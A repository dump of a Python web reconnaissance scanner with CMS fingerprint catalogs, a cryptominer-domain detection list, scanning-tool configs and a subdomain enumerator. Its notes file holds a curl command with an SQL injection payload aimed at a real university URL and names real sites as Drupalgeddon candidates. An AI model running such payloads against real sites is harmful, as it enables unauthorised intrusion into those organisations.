380 | 		<themes>
381 | 			/plugins/themes/custom//classicBrown/version.xml,
382 | 			/plugins/themes/custom//night/version.xml,
383 | 			/plugins/themes/custom//redbar/version.xml,
384 | 			/plugins/themes/custom//classicNavy/version.xml,
385 | 			/plugins/themes/custom//classicBlue/version.xml,
386 | 			/plugins/themes/custom//lilac/version.xml,
387 | 			/plugins/themes/custom//desert/version.xml,
388 | 			/plugins/themes/custom//custom/version.xml,
389 | 			/plugins/themes/custom//classicGreen/version.xml,
390 | 			/plugins/themes/custom//uncommon/version.xml,
391 | 			/plugins/themes/custom//classicRed/version.xml,
392 | 			/plugins/themes/custom//steel/version.xml,
393 | 			/plugins/themes/custom//vanilla/version.xml
394 | 		</themes>
395 | 		<postcrawl>
396 | 			True
397 | 		</postcrawl>
398 | 	</software>	
399 | 	<software name="magento">
400 | 		<headers>
401 | 			magento
402 | 		</headers>
403 | 		<wordpatterns>
404 | 			Mage.Cookies,
405 | 			BASE_SKIN_URL
406 | 		</wordpatterns>
407 | 		<files>
408 | 			shell/,media/customer,skin/frontend,media/customer,js/mage
409 | 		</files>
410 | 		<directories>
411 | 			app/,
412 | 			bin/,
413 | 			dev/,
414 | 			generated/,
415 | 			lib/,
416 | 			phpserver/,
417 | 			pub/,
418 | 			setup/,
419 | 			update/,
420 | 			var/,
421 | 			vendor/,
422 | 			downloader/,
423 | 			errors/,
424 | 			includes/,
425 | 			skin/frontend/,
426 | 			media/customer/,
427 | 			js/mage/
428 | 		</directories>
429 | 		<juicyfiles>
430 | 			Gruntfile.js,
431 | 			Gruntfile.js.sample,
432 | 			LICENSE.txt,
433 | 			auth.json,
434 | 			auth.json.sample,composer.json,
435 | 			composer.json.sample,
436 | 			composer.lock,
437 | 			app/etc/di.xml
438 | 		</juicyfiles>
439 | 		<themes>
440 | 			/skin/frontend/default/modern/favicon.ico,
441 | 			/skin/frontend/default/blank/favicon.ico,
442 | 			/skin/frontend/default/iphone/favicon.ico,
443 | 			/skin/frontend/default/blue/favicon.ico,
444 | 			/skin/frontend/default/default/favicon.ico
445 | 		</themes>
446 | 		<postcrawl>
447 | 			True
448 | 		</postcrawl>
449 | 	</software>	
450 | 	<software name="miner">
451 | 		<headers>
452 | 			ufasoft
453 | 		</headers>
454 | 		<wordpatterns>
455 | 			1q2w3.fun/,
456 | 			2giga.link/hive/lib/,
457 | 			a-o.ninja/apk-AO/kingofthenorth/,
458 | 			ad-miner.com/,
459 | 			afminer.com/code/,
460 | 			amazonaws.com/doubleclick13/,
461 | 			anime.reactor.cc/js/ch/,
462 | 			baiduccdn1.com/lib/,
463 | 			bewhoyouare.gq/,
464 | 			candid.zone/,
465 | 			cdn.cloudcoins.co/javascript/,
466 | 			chainblock.science/,
467 | 			chmproxy.bid/lib/,
468 | 			coin-have.com/,
469 | 			coin-hive.com/,
470 | 			coinblind.com/lib/,
471 | 			coinerra.com/lib/,
472 | 			coinhive.com/,
473 | 			coinlab.biz/lib/,
474 | 			coinnebula.com/lib/,
475 | 			coinpirate.cf/,
476 | 			cookiescript.info/libs/,
477 | 			cookiescriptcdn.pro/libs/,
478 | 			cpu2cash.link/,
479 | 			crypto-loot.com/,
480 | 			cryptobara.com/,
481 | 			cryptoloot.pro/lib/,
482 | 			doubleclick1.xyz/,
483 | 			doubleclick2.xyz/,
484 | 			doubleclick3.xyz/,
485 | 			doubleclick4.xyz/,
486 | 			doubleclick5.xyz/,
487 | 			doubleclick6.xyz/,
488 | 			freecontent.bid/,
489 | 			freecontent.loan/,
490 | 			freecontent.racing,gasolina.ml/,
491 | 			googleanalytcs.com/,
492 | 			goredirect.party/assets/,
493 | 			gtg02.bestsecurepractice.com/,
494 | 			hemnes.win/,
495 | 			hodling.faith/,
496 | 			host.d-ns.ga/,
497 | 			joyreactor.cc/ws/ch/,
498 | 			jsccnn.com/content/,
499 | 			jscdndel.com/content/,
500 | 			jsecoin.com/,
501 | 			kickass.cd/,
502 | 			kissdoujin.com/,
503 | 			kisshentai.net/,
504 | 			kiwifarms.net/,
505 | 			l33tsite.info/,
506 | 			lewd.ninja/,
507 | 			listat.biz/,
508 | 			lmodr.biz/,
509 | 			mataharirama.xyz/,
510 | 			mine.nahnoji.cz/,
511 | 			mine.torrent.pw/,
512 | 			minecrunch.co/web/,
513 | 			minemytraffic.com/,
514 | 			miner.pr0gramm.com/,
515 | 			minero.pw/,
516 | 			minescripts.info/,
517 | 			monerise.com/,
518 | 			monerominer.rocks/,
519 | 			morningdigit.com/,
520 | 			mutuza.win/,
521 | 			papoto.com/lib/,
522 | 			party-nngvitbizn.now.sh/,
523 | 			playerassets.info/,
524 | 			plugins/ajcryptominer/assets/,
525 | 			ppoi.org/,
526 | 			punchsub.net/,
527 | 			reasedoper.pw/,
528 | 			rocks.io/,
529 | 			sen-to-zdrowie.ml/,
530 | 			stackpathdns.com/assets/javascript/,
531 | 			tokyodrift.ga/,
532 | 			tubetitties.com/,
533 | 			turnsocial.com/,
534 | 			turnsocial.now.sh/,
535 | 			webmine.cz/,
536 | 			webmine.pro/,
537 | 			webminepool.com/,
538 | 			webminepool.tk/,
539 | 			zlx.com.br/
540 | 		</wordpatterns>
541 | 		<files>
542 | 			this_is_pending
543 | 		</files>
544 | 		<directories>
545 | 			this_is_pending
546 | 		</directories>
547 | 		<juicyfiles>
548 | 			this_is_pending
549 | 		</juicyfiles>
550 | 		<themes>
551 | 			this_is_pending
552 | 		</themes>
553 | 		<postcrawl>
554 | 			False
555 | 		</postcrawl>
556 | 	</software>	
557 | </softwarecatalog>
558 | 


--------------------------------------------------------------------------------
/data/extensions_blacklist.txt:
--------------------------------------------------------------------------------
  1 | .3g2
  2 | .3gp
  3 | .7z
  4 | .aac
  5 | .abw
  6 | .ac
  7 | .acc
  8 | .ace
  9 | .aep
 10 | .ai
 11 | .aif
 12 | .apk
 13 | .avi
 14 | .azw
 15 | .bcpio
 16 | .bin
 17 | .bmp
 18 | .bz
 19 | .bz2
 20 | .c
 21 | .cab
 22 | .cdkey
 23 | .chrt
 24 | .cod
 25 | .csh
 26 | .css
 27 | .csv
 28 | .djvu
 29 | .doc
 30 | .docx
 31 | .dotx
 32 | .dra
 33 | .dtd
 34 | .dts
 35 | .dwf
 36 | .dwg
 37 | .dxf
 38 | .eml
 39 | .epub
 40 | .exe
 41 | .f4v
 42 | .fbs
 43 | .flv
 44 | .flw
 45 | .flx
 46 | .gif
 47 | .gv
 48 | .h261
 49 | .h263
 50 | .h264
 51 | .ico
 52 | .ief
 53 | ".jpeg
 54 | .jpgv
 55 | .jpm
 56 | .karbon
 57 | .kfo
 58 | .kml
 59 | .kmz
 60 | .kon
 61 | .kpr
 62 | .ksp
 63 | .kwd
 64 | .latex
 65 | .m3u
 66 | .m4v
 67 | .mdb
 68 | .mdi
 69 | .mgz
 70 | .mid
 71 | .mj2
 72 | .movie
 73 | .mp4
 74 | .mp4a
 75 | .mpeg
 76 | .mpga
 77 | .mscml
 78 | .mxu
 79 | .oga
 80 | .ogv
 81 | .ogx
 82 | .par
 83 | .pbm
 84 | .pcf
 85 | .pcx
 86 | .pdf
 87 | .pfa
 88 | .pfr
 89 | .pgm
 90 | .pgn
 91 | .pjpeg
 92 | .png
 93 | .pnm
 94 | .potx
 95 | .ppd
 96 | .ppm
 97 | .ppsx
 98 | .ppt
 99 | .pptx
100 | .psd
101 | .pub
102 | .ram
103 | .rar
104 | .rgb
105 | .rtf
106 | .rtx
107 | .sldx
108 | .svg
109 | .swf
110 | .sxc
111 | .sxd
112 | .sxg
113 | .sxi
114 | .sxm
115 | .sxw
116 | .tex
117 | .tiff
118 | .txt
119 | .uvm
120 | .uvu
121 | .wav
122 | .wm
123 | .wma
124 | .wmv
125 | .wvx
126 | .xap
127 | .xdf
128 | .xfdl
129 | .xif
130 | .xlam
131 | .xls
132 | .xlsb
133 | .xlsm
134 | .xlsx
135 | .xltm
136 | .xltx
137 | .xml
138 | 


--------------------------------------------------------------------------------
/data/mime_types.txt:
--------------------------------------------------------------------------------
  1 | 3GP,video/3gpp,.3gp,Wikipedia: 3GP
  2 | 3GP2,video/3gpp2,.3g2,Wikipedia: 3G2
  3 | 7-Zip,application/x-7z-compressed,.7z,Wikipedia: 7-Zip
  4 | AbiWord,application/x-abiword,.abw,Wikipedia: AbiWord
  5 | Ace Archive,application/x-ace-compressed,.ace,Wikipedia: ACE
  6 | Active Content Compression,application/vnd.americandynamics.acc,.acc,IANA: Active Content Compression
  7 | Adobe Flash,application/x-shockwave-flash,.swf,Wikipedia: Adobe Flash
  8 | Adobe Portable Document Format,application/pdf,.pdf,Adobe PDF
  9 | Adobe PostScript Printer Description File Format,application/vnd.cups-ppd,.ppd,IANA: Cups
 10 | Advanced Audio Coding (AAC),audio/x-aac,.aac,Wikipedia: AAC
 11 | Amazon Kindle eBook format,application/vnd.amazon.ebook,.azw,Kindle Direct Publishing
 12 | Android Package Archive,application/vnd.android.package-archive,.apk,Wikipedia: APK File Format
 13 | Arista Networks Software Image,application/vnd.aristanetworks.swi,.swi,IANA: Arista Networks Software Image
 14 | Atom Publishing Protocol,application/atomcat+xml,.atomcat,RFC 5023
 15 | Atom Publishing Protocol Service Document,application/atomsvc+xml,.atomsvc,RFC 5023
 16 | Atom Syndication Format,application/atom+xml,".atom, .xml",RFC 4287
 17 | Attribute Certificate,application/pkix-attr-cert,.ac,RFC 5877
 18 | Audio Interchange File Format,audio/x-aiff,.aif,Wikipedia: Audio Interchange File Format
 19 | Audio Video Interleave (AVI),video/x-msvideo,.avi,Wikipedia: AVI
 20 | Audiograph,application/vnd.audiograph,.aep,IANA: Audiograph
 21 | AutoCAD DXF,image/vnd.dxf,.dxf,Wikipedia: AutoCAD DXF
 22 | Autodesk Design Web Format (DWF),model/vnd.dwf,.dwf,Wikipedia: Design Web Format
 23 | BAS Partitur Format,text/plain-bas,.par,Phonetik BAS
 24 | Binary CPIO Archive,application/x-bcpio,.bcpio,Wikipedia: cpio
 25 | Binary Data,application/octet-stream,.bin,
 26 | Bitmap Image File,image/bmp,.bmp,Wikipedia: BMP File Format
 27 | Blackberry COD File,application/vnd.rim.cod,.cod,
 28 | Bzip Archive,application/x-bzip,.bz,Wikipedia: Bzip
 29 | Bzip2 Archive,application/x-bzip2,.bz2,Wikipedia: Bzip
 30 | C Shell Script,application/x-csh,.csh,Wikipedia: C Shell
 31 | C Source File,text/x-c,.c,Wikipedia: C Programming Language
 32 | Cascading Style Sheets (CSS),text/css,.css,Wikipedia: CSS
 33 | Comma-Seperated Values,text/csv,.csv,Wikipedia: CSV
 34 | DECE Mobile Video,video/vnd.dece.mobile,.uvm,IANA: DECE Mobile Video
 35 | DECE MP4,video/vnd.uvvu.mp4,.uvu,IANA: DECE MP4
 36 | DjVu,image/vnd.djvu,.djvu,Wikipedia: DjVu
 37 | Document Type Definition,application/xml-dtd,.dtd,W3C DTD
 38 | DRA Audio,audio/vnd.dra,.dra,IANA: DRA
 39 | DTS Audio,audio/vnd.dts,.dts,IANA: DTS
 40 | DWG Drawing,image/vnd.dwg,.dwg,Wikipedia: DWG
 41 | EFI Proteus,application/vnd.proteus.magazine,.mgz,IANA: EFI Proteus
 42 | Electronic Publication,application/epub+zip,.epub,Wikipedia: EPUB
 43 | Email Message,message/rfc822,.eml,RFC 2822
 44 | eXtended Image File Format (XIFF),image/vnd.xiff,.xif,IANA: XIFF
 45 | Extensible Forms Description Language,application/vnd.xfdl,.xfdl,IANA: Extensible Forms Description Language
 46 | FastBid Sheet,image/vnd.fastbidsheet,.fbs,IANA: FastBid Sheet
 47 | Flash Video,video/x-f4v,.f4v,Wikipedia: Flash Video
 48 | Flash Video,video/x-flv,.flv,Wikipedia: Flash Video
 49 | FLEXSTOR,text/vnd.fmi.flexstor,.flx,IANA: FLEXSTOR
 50 | Google Earth - KML,application/vnd.google-earth.kml+xml,.kml,IANA: Google Earth
 51 | Google Earth - Zipped KML,application/vnd.google-earth.kmz,.kmz,IANA: Google Earth
 52 | Graphics Interchange Format,image/gif,.gif,Wikipedia: Graphics Interchange Format
 53 | Graphviz,text/vnd.graphviz,.gv,IANA: Graphviz
 54 | H.261,video/h261,.h261,Wikipedia: H.261
 55 | H.263,video/h263,.h263,Wikipedia: H.263
 56 | H.264,video/h264,.h264,Wikipedia: H.264
 57 | Icon Image,image/x-icon,.ico,Wikipedia: ICO File Format
 58 | Image Exchange Format,image/ief,.ief,RFC 1314
 59 | JPEG 2000 Compound Image File Format,video/jpm,.jpm,IANA: JPM
 60 | JPEG Image,image/jpeg,".jpeg, .jpg",RFC 1314
 61 | JPEG Image (Citrix client),image/x-citrix-jpeg,".jpeg, .jpg",RFC 1314
 62 | JPEG Image (Progressive),image/pjpeg,.pjpeg,JPEG image compression FAQ
 63 | JPGVideo,video/jpeg,.jpgv,RFC 3555
 64 | KDE KOffice Office Suite - Karbon,application/vnd.kde.karbon,.karbon,IANA: KDE KOffice Office Suite
 65 | KDE KOffice Office Suite - KChart,application/vnd.kde.kchart,.chrt,IANA: KDE KOffice Office Suite
 66 | KDE KOffice Office Suite - Kformula,application/vnd.kde.kformula,.kfo,IANA: KDE KOffice Office Suite
 67 | KDE KOffice Office Suite - Kivio,application/vnd.kde.kivio,.flw,IANA: KDE KOffice Office Suite
 68 | KDE KOffice Office Suite - Kontour,application/vnd.kde.kontour,.kon,IANA: KDE KOffice Office Suite
 69 | KDE KOffice Office Suite - Kpresenter,application/vnd.kde.kpresenter,.kpr,IANA: KDE KOffice Office Suite
 70 | KDE KOffice Office Suite - Kspread,application/vnd.kde.kspread,.ksp,IANA: KDE KOffice Office Suite
 71 | KDE KOffice Office Suite - Kword,application/vnd.kde.kword,.kwd,IANA: KDE KOffice Office Suite
 72 | LaTeX,application/x-latex,.latex,Wikipedia: LaTeX
 73 | M3U (Multimedia Playlist),audio/x-mpegurl,.m3u,Wikipedia: M3U
 74 | M4v,video/x-m4v,.m4v,Wikipedia: M4v
 75 | Media Server Control Markup Language,application/mediaservercontrol+xml,.mscml,RFC 5022
 76 | MediaRemote,application/vnd.mediastation.cdkey,.cdkey,IANA: MediaRemote
 77 | Microsoft Access,application/x-msaccess,.mdb,Wikipedia: Microsoft Access
 78 | Microsoft Application,application/x-msdownload,.exe,Wikipedia: EXE
 79 | Microsoft Cabinet File,application/vnd.ms-cab-compressed,.cab,IANA: MS Cabinet File
 80 | Microsoft Document Imaging Format,image/vnd.ms-modi,.mdi,Wikipedia: Microsoft Document Image Format
 81 | Microsoft Excel,application/vnd.ms-excel,.xls,IANA: MS Excel
 82 | Microsoft Excel - Add-In File,application/vnd.ms-excel.addin.macroenabled.12,.xlam,IANA: MS Excel
 83 | Microsoft Excel - Binary Workbook,application/vnd.ms-excel.sheet.binary.macroenabled.12,.xlsb,IANA: MS Excel
 84 | Microsoft Excel - Macro-Enabled Template File,application/vnd.ms-excel.template.macroenabled.12,.xltm,IANA: MS Excel
 85 | Microsoft Excel - Macro-Enabled Workbook,application/vnd.ms-excel.sheet.macroenabled.12,.xlsm,IANA: MS Excel
 86 | Microsoft Office - OOXML - Presentation,application/vnd.openxmlformats-officedocument.presentationml.presentation,.pptx,IANA: OOXML - Presentation
 87 | Microsoft Office - OOXML - Presentation (Slide),application/vnd.openxmlformats-officedocument.presentationml.slide,.sldx,IANA: OOXML - Presentation
 88 | Microsoft Office - OOXML - Presentation (Slideshow),application/vnd.openxmlformats-officedocument.presentationml.slideshow,.ppsx,IANA: OOXML - Presentation
 89 | Microsoft Office - OOXML - Presentation Template,application/vnd.openxmlformats-officedocument.presentationml.template,.potx,IANA: OOXML - Presentation Template
 90 | Microsoft Office - OOXML - Spreadsheet,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,.xlsx,IANA: OOXML - Spreadsheet
 91 | Microsoft Office - OOXML - Spreadsheet Template,application/vnd.openxmlformats-officedocument.spreadsheetml.template,.xltx,IANA: OOXML - Spreadsheet Template
 92 | Microsoft Office - OOXML - Word Document,application/vnd.openxmlformats-officedocument.wordprocessingml.document,.docx,IANA: OOXML - Word Document
 93 | Microsoft Office - OOXML - Word Document Template,application/vnd.openxmlformats-officedocument.wordprocessingml.template,.dotx,IANA: OOXML - Word Document Template
 94 | Microsoft PowerPoint,application/vnd.ms-powerpoint,.ppt,IANA: MS PowerPoint
 95 | Microsoft Publisher,application/x-mspublisher,.pub,Wikipedia: Microsoft Publisher
 96 | Microsoft Silverlight,application/x-silverlight-app,.xap,Wikipedia: Silverlight
 97 | Microsoft Windows Media,video/x-ms-wm,.wm,Wikipedia: Advanced Systems Format (ASF)
 98 | Microsoft Windows Media Audio,audio/x-ms-wma,.wma,Wikipedia: Windows Media Audio
 99 | Microsoft Windows Media Video,video/x-ms-wmv,.wmv,Wikipedia: Advanced Systems Format (ASF)
100 | Microsoft Windows Media Video Playlist,video/x-ms-wvx,.wvx,Wikipedia: Advanced Systems Format (ASF)
101 | Microsoft Word,application/msword,.doc,Wikipedia: Microsoft Word
102 | MIDI - Musical Instrument Digital Interface,audio/midi,.mid,Wikipedia: MIDI
103 | Motion JPEG 2000,video/mj2,.mj2,IANA: MJ2
104 | MPEG Audio,audio/mpeg,.mpga,Wikipedia: MPGA
105 | MPEG Url,video/vnd.mpegurl,.mxu,IANA: MPEG Url
106 | MPEG Video,video/mpeg,.mpeg,Wikipedia: MPEG
107 | MPEG-4 Audio,audio/mp4,.mp4a,Wikipedia: MP4A
108 | MPEG-4 Video,video/mp4,.mp4,Wikipedia: MP4
109 | MPEG4,application/mp4,.mp4,RFC 4337
110 | Ogg,application/ogg,.ogx,Wikipedia: Ogg
111 | Ogg Audio,audio/ogg,.oga,Wikipedia: Ogg
112 | Ogg Video,video/ogg,.ogv,Wikipedia: Ogg
113 | OpenOffice - Calc (Spreadsheet),application/vnd.sun.xml.calc,.sxc,Wikipedia: OpenOffice
114 | OpenOffice - Draw (Graphics),application/vnd.sun.xml.draw,.sxd,Wikipedia: OpenOffice
115 | OpenOffice - Impress (Presentation),application/vnd.sun.xml.impress,.sxi,Wikipedia: OpenOffice
116 | OpenOffice - Math (Formula),application/vnd.sun.xml.math,.sxm,Wikipedia: OpenOffice
117 | OpenOffice - Writer (Text - HTML),application/vnd.sun.xml.writer,.sxw,Wikipedia: OpenOffice
118 | OpenOffice - Writer (Text - HTML),application/vnd.sun.xml.writer.global,.sxg,Wikipedia: OpenOffice
119 | PCX Image,image/x-pcx,.pcx,Wikipedia: PCX
120 | Photoshop Document,image/vnd.adobe.photoshop,.psd,Wikipedia: Photoshop Document
121 | Portable Anymap Image,image/x-portable-anymap,.pnm,Wikipedia: Netpbm Format
122 | Portable Bitmap Format,image/x-portable-bitmap,.pbm,Wikipedia: Netpbm Format
123 | Portable Compiled Format,application/x-font-pcf,.pcf,Wikipedia: Portable Compiled Format
124 | Portable Font Resource,application/font-tdpfr,.pfr,RFC 3073
125 | Portable Game Notation (Chess Games),application/x-chess-pgn,.pgn,Wikipedia: Portable Game Notationb
126 | Portable Graymap Format,image/x-portable-graymap,.pgm,Wikipedia: Netpbm Format
127 | Portable Network Graphics (PNG),image/png,.png,RFC 2083
128 | Portable Network Graphics (PNG) (Citrix client),image/x-citrix-png,.png,RFC 2083
129 | Portable Network Graphics (PNG) (x-token),image/x-png,.png,RFC 2083
130 | Portable Pixmap Format,image/x-portable-pixmap,.ppm,Wikipedia: Netpbm Format
131 | PostScript,application/postscript,.ai,Wikipedia: PostScript
132 | PostScript Fonts,application/x-font-type1,.pfa,Wikipedia: PostScript Fonts
133 | RAR Archive,application/x-rar-compressed,.rar,Wikipedia: RAR
134 | Real Audio Sound,audio/x-pn-realaudio,.ram,Wikipedia: RealPlayer
135 | Rich Text Format,application/rtf,.rtf,Wikipedia: Rich Text Format
136 | Rich Text Format (RTF),text/richtext,.rtx,Wikipedia: Rich Text Format
137 | Scalable Vector Graphics (SVG),image/svg+xml,.svg,Wikipedia: SVG
138 | SGI Movie,video/x-sgi-movie,.movie,SGI Facts
139 | Silicon Graphics RGB Bitmap,image/x-rgb,.rgb,RGB Image Format
140 | Tagged Image File Format,image/tiff,.tiff,Wikipedia: TIFF
141 | TeX,application/x-tex,.tex,Wikipedia: TeX
142 | Text File,text/plain,.txt,Wikipedia: Text File
143 | Waveform Audio File Format (WAV),audio/x-wav,.wav,Wikipedia: WAV
144 | XML - Extensible Markup Language,application/xml,.xml,W3C XML
145 | XML Configuration Access Protocol - XCAP Diff,application/xcap-diff+xml,.xdf,Wikipedia: XCAP
146 | 


--------------------------------------------------------------------------------
/data/scanningtools.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" ?>
 2 | <toolcatalog>
 3 | 	<tool name="drupal">
 4 | 		<path>/usr/local/bin/droopescan</path>
 5 | 		<targ>scan</targ>
 6 | 		<targ>drupal</targ>
 7 | 		<targ>-u</targ>
 8 | 		<targ>{url}</targ>
 9 | 		<tflag score="5">[+]</tflag>
10 | 	</tool>
11 | 	<tool name="joomla">
12 | 		<path>/usr/bin/joomscan</path>
13 | 		<targ>-u</targ>
14 | 		<targ>{url}</targ>
15 | 		<targ>-nvf</targ>
16 | 		<tflag score="5">#</tflag>
17 | 	</tool>
18 | 	<tool name="magento">
19 | 		<path>/usr/bin/php</path>
20 | 		<targ>/home/chaos/tools/magescan.phar</targ>
21 | 		<targ>scan:all</targ>
22 | 		<targ>{url}</targ>
23 | 		<tflag score="1">Yes</tflag>
24 | 		<tflag score="5">Fail</tflag>
25 | 	</tool>
26 | 	<tool name="moodle">
27 | 		<path>/usr/local/bin/droopescan</path>
28 | 		<targ>scan</targ>
29 | 		<targ>moodle</targ>
30 | 		<targ>-u</targ>
31 | 		<targ>{url}</targ>
32 | 		<tflag score="5">[+]</tflag>
33 | 	</tool>
34 | 	<tool name="wordpress">
35 | 		<path>/usr/bin/wpscan</path>
36 | 		<targ>--url</targ>
37 | 		<targ>{url}</targ>
38 | 		<targ>--disable-tls-checks</targ>
39 | 		<targ>--force</targ>
40 | 		<tflag score="1">[+]</tflag>
41 | 		<tflag score="5">[!]</tflag>
42 | 	</tool>		
43 | </toolcatalog>
44 | 


--------------------------------------------------------------------------------
/detection/__init__.py:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/detection/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/__init__.pyc


--------------------------------------------------------------------------------
/detection/dnsenum.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | import sys
 4 | class dnsenum:
 5 | 	def __init__(self):
 6 | 		self.results = []
 7 | 		
 8 | 	def dnsdumpster(self,domain,timeout):
 9 | 		#print('entre a dnsdumpster')
10 | 		# obtengo las cookies
11 | 		headersx = {'Content-Type': 'application/x-www-form-urlencoded','Referer':'https://dnsdumpster.com/'}
12 | 		cookiesx = {'csrftoken':'z6fNnmNzrmuhG5rrSSpApbtsoE6Cp666'} 
13 | 		datapayloadx = {'csrfmiddlewaretoken':'z6fNnmNzrmuhG5rrSSpApbtsoE6Cp666','targetip':domain}
14 | 		try:
15 | 			r = requests.post('https://dnsdumpster.com',headers=headersx,cookies=cookiesx,data=datapayloadx,timeout=timeout)
16 | 			ms = re.findall('col-md-4\">(.*)<br>',r.text)
17 | 			# Y las imprimo
18 | 			for m in ms:
19 | 				if m not in self.results:
20 | 					self.results.append(m)
21 | 		except Exception as e:
22 | 			print 'Cant get subdomains_info for %s '%(domain)
23 | 			#print(e)
24 | 
25 | 	def getResults(self,domain,timeout):
26 | 		self.results = []
27 | 		self.dnsdumpster(domain,timeout)
28 | 		# Titulo+resultados
29 | 		return ['dns subdomains']+self.results
30 | 


--------------------------------------------------------------------------------
/detection/dnsenum.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/dnsenum.pyc


--------------------------------------------------------------------------------
/detection/notas:
--------------------------------------------------------------------------------
1 | Posible XSS:
2 | curl -g "http://cuved.unam.mx/cuved/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,truerandomtruerandom),1)" -s | grep truerandom --color
3 | 
4 | Drupalgeddon
5 | http://mediacampus.cuaed.unam.mx/
6 | http://redensayo.cialc.unam.mx/
7 | 
8 | 


--------------------------------------------------------------------------------
/detection/swcontroller.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | from xml.dom.minidom import parse
  3 | import requests
  4 | from swdetection import *
  5 | #from ConfigParser import *
  6 | from config.ConfigParser import *
  7 | from utils import parseurls
  8 | 
  9 | # Controlador para los detectores de contenido
 10 | class swcontroller:
 11 | 	#def __init__(self,configfile,detectors = None):
 12 | 	# objeto para peticiones
 13 | 	# swcontroller tiene un objeto vulncontroller
 14 | 	# def __init__(self,configfile,configdir,req,vulncontroller,color=False,detectors = None):
 15 | 	def __init__(self,configfile,datadir,req,vulncontroller,color=False,detectors = None):
 16 | 		self.configfile = configfile
 17 | 		self.datadir = datadir
 18 | 		self.vulncontroller = vulncontroller
 19 | 		self.color = color
 20 | 		self.detectors = detectors
 21 | 		self.req = req
 22 | 		self.tools = []
 23 | 		self.configparser = ConfigParser(self.configfile)
 24 | 		self.initTools()
 25 | 		
 26 | 	def setConfFile(self,configfile):
 27 | 		if configfile is not None: self.configfile = configfile
 28 | 	
 29 | 	# Aqui solo pongo los detectores pasados como parametros
 30 | 	"""
 31 | 	def setDetectors(self,detectors):
 32 | 		if detectors is not None: self.detectors = detectors
 33 | 	"""
 34 | 	
 35 | 	# define los modulos de deteccion a ocupar
 36 | 	def initTools(self):
 37 | 		# wordpatterns,files,directories,headers,juicyfiles,postcrawling
 38 | 		scanners = []
 39 | 		swmods = self.getSoftwareModules()
 40 | 		for sw in swmods.keys():
 41 | 			wpatterns = swmods[sw][0]
 42 | 			files = swmods[sw][1]
 43 | 			dirs = swmods[sw][2]
 44 | 			headers = swmods[sw][3]
 45 | 			juicyfiles = swmods[sw][4]
 46 | 			postcrawling = swmods[sw][5]
 47 | 			themes = swmods[sw][6]
 48 | 			actscan = genscan(self.req,self.color,self.datadir,sw,headers,
 49 | 			wpatterns,files,dirs,juicyfiles,postcrawling,themes)
 50 | 			actscan.setToolPath(self.configparser.getPath(sw))
 51 | 			actscan.setToolArgs(self.configparser.getToolArg(sw))
 52 | 			actscan.setToolFlags(self.configparser.getToolFlags(sw))
 53 | 			scanners.append(actscan)
 54 | 		mail = mailscan(self.req,self.color)
 55 | 		params = paramscanner(self.req,self.color)
 56 | 		content = contentscan(self.req,self.color)
 57 | 		backscan = backupscan(self.req,self.color)
 58 | 		self.tools = scanners+[mail,params,content,backscan]
 59 | 		#self.tools = [wordpress,drupal,moodle,joomla,ojs,magento,mail,params,content,backscan]		
 60 | 	
 61 | 	# Regresa un diccionario con los softwares a identificar y como identificarlos
 62 | 	# {'nombresoftware':[wpatterns],[files],[directories],[headers],[juicydata],postcrawling}
 63 | 	# esto para aprovechar la herencia y no tener un constructor de cada
 64 | 	# cms, sino iterar por nombre en el diccionario y pasar las listas
 65 | 	# como datos al constructor de cada software en swdetection
 66 | 	# # wordpatterns,files,directories,headers,juicyfiles,postcrawling
 67 | 	def getSoftwareModules(self):
 68 | 		dom = parse(self.datadir)
 69 | 		# diccionario para las herramientas
 70 | 		sw = {}
 71 | 		xmltools=dom.getElementsByTagName('software')
 72 | 		for node in xmltools:
 73 | 			tool_name=node.getAttribute('name')
 74 | 			wpdata,fidata,dirdata,headdata,juicydata,themedata = [],[],[],[],[],[]
 75 | 			pcdata = False
 76 | 			############## wordpatterns ###################
 77 | 			wplist=node.getElementsByTagName('wordpatterns')
 78 | 			for wp in wplist: wpdata = wp.firstChild.data
 79 | 			if wpdata is not None: wpdata = wpdata.replace('\n','').replace('\t','').split(',')
 80 | 			############### files #######################
 81 | 			filelist=node.getElementsByTagName('files')
 82 | 			for fi in filelist: fidata = fi.firstChild.data
 83 | 			if fidata is not None: fidata = fidata.replace('\n','').replace('\t','').split(',')
 84 | 			############### dirs ########################
 85 | 			dirlist=node.getElementsByTagName('directories')
 86 | 			for di in dirlist: dirdata = di.firstChild.data
 87 | 			if dirdata is not None: dirdata = dirdata.replace('\n','').replace('\t','').split(',')
 88 | 			############# headers #######################
 89 | 			headlist=node.getElementsByTagName('headers')
 90 | 			for hi in headlist: headdata = hi.firstChild.data
 91 | 			if headdata is not None: headdata = headdata.replace('\n','').replace('\t','').split(',')
 92 | 			############# juicyfiles #######################
 93 | 			jflist=node.getElementsByTagName('juicyfiles')
 94 | 			for jf in jflist: juicydata = jf.firstChild.data
 95 | 			if juicydata is not None: juicydata = juicydata.replace('\n','').replace('\t','').split(',')
 96 | 			############# themes #######################
 97 | 			themelist=node.getElementsByTagName('themes')
 98 | 			for th in themelist: themedata = th.firstChild.data
 99 | 			if themedata is not None and len(themedata)>0:
100 | 				themedata = themedata.replace('\n','').replace('\t','').split(',')
101 | 			############# postcrawling #######################
102 | 			pclist=node.getElementsByTagName('postcrawl')
103 | 			for pc in pclist: pcdata = pc.firstChild.data
104 | 			if pcdata is not None:
105 | 				pcdata = pcdata.replace('\n','').replace('\t','')
106 | 				if pcdata == "True": pcdata = True
107 | 				else: pcdata = False
108 | 			sw[tool_name] = [wpdata,fidata,dirdata,headdata,juicydata,themedata,pcdata]
109 | 		#print('DEBUG swcontroller')
110 | 		for skey in sw.keys():
111 | 			print('\n{'+skey+':')
112 | 			for sk_elem in sw[skey]:
113 | 				print(sk_elem)
114 | 			print('}')
115 | 		return sw
116 | 		
117 | 	def fromHeaders(self,rheaders,direccion):
118 | 		for tool in self.tools:
119 | 			tool.fromHeaders(rheaders,direccion)
120 | 
121 | 	def fromCode(self,rcode,direccion):
